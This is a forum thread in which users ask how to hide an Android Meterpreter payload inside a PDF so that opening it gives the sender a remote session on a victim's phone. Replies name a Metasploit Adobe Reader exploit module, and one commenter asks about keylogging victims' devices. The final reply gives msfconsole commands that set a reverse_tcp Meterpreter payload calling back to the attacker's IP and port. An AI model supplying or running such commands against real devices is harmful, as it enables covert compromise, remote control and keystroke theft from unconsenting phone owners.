Hi there my hacking mates,
I recently fell in love with metasploit and currently I'm into pentesting Android devices. I already managed to drop an android meterpreter shell with help of an .apk, but I'd like to take it a step further.
Since there are quite a few ways (and exploits) for PDF documents for Windows, I was wondering if there is a way to embed an android meterpreter payload into an PDF.
I found a fileformat PDF exploit for Android devices in the Metasploit framework, but sadly I wasn't able to get it to work with an android meterpreter payload.
Is there a way to embed such a payload inside a PDF document, so when the user opens the PDF on their Android we will get a meterpreter session?
-B1337
8 Responses
It will be nice if you try to re-post this question . Even I , would like to know if there's any way to it
and I think we can explore this exploit
(exploit/android/fileformat/adobe_reader_pdf_js_interface)
We can use the
(exploit/android/fileformat/adobe_reader_pdf_js_interface)
exploit.
I guess there's no option for embedding payload in pdf. What we can do is create pdf using msf and then add pages in it using Acrobat.
but can u tell me how we can listen to the payload or what type of payload should we set to get a meterpreter session?
I have tried with msfvenom and saving it as a .pdf but it failed to open on android devices saying that its unsupported format
If there is a way of making it work I think it can get u somewhere
Bro i create the payload into the pdf and the pdf can be opened but the exploit comment is not work for my phone what can i do
is there a way to capture keystrokes from victims android device???
i'm asking about keylogger
*use exploit/android/fileformat/adobereaderpdfjsinterface
set payload android/meterpreter/reverse_tcp
set lhost 192.168.182.136 (your IP here)
set port 20068
exploit*
Share Your Thoughts